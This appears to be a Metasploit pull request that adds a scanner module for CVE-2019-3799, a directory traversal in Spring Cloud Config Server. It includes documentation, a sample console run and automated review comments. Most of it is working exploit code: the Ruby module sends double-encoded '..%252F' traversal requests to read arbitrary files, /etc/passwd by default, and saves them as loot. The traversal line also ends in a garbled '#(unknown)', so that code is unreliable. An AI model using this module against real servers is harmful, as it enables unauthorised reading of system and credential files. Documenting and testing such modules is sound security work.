Land #11745, Add spring-cloud-config-server dir traversal
documentation/modules/auxiliary/scanner/http/springcloud_traversal.md (35 additions, 0 deletions)
@@ -0,0 +1,35 @@ | ||
## Description | ||
|
||
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. | ||
Spring Cloud Config listens by default on port 8888. | ||
|
||
### Vulnerable Application | ||
|
||
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip | ||
|
||
## Verification | ||
|
||
1. `./msfconsole` | ||
2. `use auxiliary/scanner/http/springcloud_traversal` | ||
3. `set rhosts <rhost>` | ||
4. `run` | ||
|
||
## Scenarios | ||
|
||
### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux | ||
|
||
``` | ||
msf > use auxiliary/scanner/http/springcloud_traversal | ||
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132 | ||
RHOSTS => 192.168.1.132 | ||
msf auxiliary(scanner/http/springcloud_traversal) > run | ||
[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt | ||
[*] Scanned 1 of 1 hosts (100% complete) | ||
[*] Auxiliary module execution completed | ||
msf auxiliary(scanner/http/springcloud_traversal) > | ||
``` | ||
|
||
## References | ||
|
||
* https://pivotal.io/security/cve-2019-3799 |
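Review bot: the Description and Verification steps never mention the module's FILEPATH and DEPTH options, so a reader cannot tell which file the scenario fetched or why the traversal depth defaults to 13; add both to the Verification list (e.g. `set FILEPATH /etc/passwd` and `set DEPTH 13`) and show a line or two of the retrieved file after the `File saved in:` message so the result is verifiable. Minor: `2.1.2,versions` is missing a space, and the `### Tested against Linux zero 4.15.0-48-generic ...` heading names the target kernel but not the Spring Cloud Config version that was tested; state the server version (the Vulnerable Application link points at v2.1.1.RELEASE) so the scenario is reproducible.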
@@ -0,0 +1,71 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Auxiliary::Report | ||
include Msf::Auxiliary::Scanner | ||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Spring Cloud Config Server Directory Traversal', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated directory traversal vulnerability | ||
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2, | ||
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring | ||
Cloud Config listens by default on port 8888. | ||
}, | ||
'References' => | ||
[ | ||
['CVE', '2019-3799'], | ||
['URL', 'https://pivotal.io/security/cve-2019-3799'] | ||
], | ||
'Author' => | ||
[ | ||
'Vern', # Vulnerability discovery | ||
'Dhiraj Mishra' # Metasploit module | ||
], | ||
'DisclosureDate' => '2019-04-17', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(8888), | ||
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']), | ||
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) | ||
]) | ||
end | ||
|
||
def data | ||
Rex::Text.rand_text_alpha(3..8) | ||
end | ||
|
||
def run_host(ip) | ||
filename = datastore['FILEPATH'] | ||
traversal = "#{"..%252F" * datastore['DEPTH']}#(unknown)" | ||
uri = "/#{data}/#{data}/master/#{traversal}" | ||
|
||
res = send_request_raw({ | ||
'method' => 'GET', | ||
'uri' => uri | ||
}) | ||
|
||
unless res && res.code == 200 | ||
print_error('Nothing was downloaded') | ||
return | ||
end | ||
|
||
vprint_good("#{peer} - #{res.body}") | ||
path = store_loot( | ||
'springcloud.traversal', | ||
'text/plain', | ||
ip, | ||
res.body, | ||
filename | ||
) | ||
print_good("File saved in: #{path}") | ||
end | ||
end |
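Review bot: the success check at `unless res && res.code == 200` treats any 200 as a retrieved file, so a 200 with an empty body would still be written with `store_loot` and announced as `File saved in:`; check that `res.body` is non-empty before storing, and call `report_vuln` with the CVE-2019-3799 reference (the module includes `Msf::Auxiliary::Report` but only ever calls `store_loot`), so the host is flagged as vulnerable in the database rather than only leaving a loot file. Also, the tail of the `traversal = "#{"..%252F" * datastore['DEPTH']}#(unknown)"` line does not read as an interpolation of the `filename` variable assigned on the line above; confirm that FILEPATH is actually appended to the request path, otherwise the option has no effect and every request ends in the same traversal prefix. A one-line comment explaining why the separator is double-encoded (`..%252F` rather than `../`) would help maintainers understand which decoding step the bypass relies on.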